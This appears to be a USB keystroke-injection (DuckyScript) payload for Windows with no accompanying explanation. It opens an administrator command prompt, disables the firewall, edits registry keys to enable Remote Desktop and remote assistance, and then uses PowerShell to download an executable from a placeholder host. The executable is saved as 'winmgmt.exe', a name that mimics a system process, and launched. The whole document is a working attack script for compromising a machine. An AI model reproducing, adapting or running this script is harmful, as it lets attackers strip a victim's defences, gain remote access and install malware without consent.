ESCAPE
DELAY 400
CONTROL ESCAPE
DELAY 400
STRING cmd
DELAY 400
MENU
DELAY 400
STRING a
DELAY 700
LEFTARROW
DELAY 400
ENTER
DELAY 800
ENTER
STRING netsh firewall set opmode disable
ENTER
DELAY 300
STRING reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f
ENTER
DELAY 300
STRING reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fAllowToGetHelp /t REG_DWORD /d 1 /f
ENTER
DELAY 300
STRING powershell (new-object System.Net.WebClient).DownloadFile('http://domain/winmgmt.txt','%TEMP%\winmgmt.exe'); Start-Process "%TEMP%\winmgmt.exe"
ENTER
STRING exit
ENTER
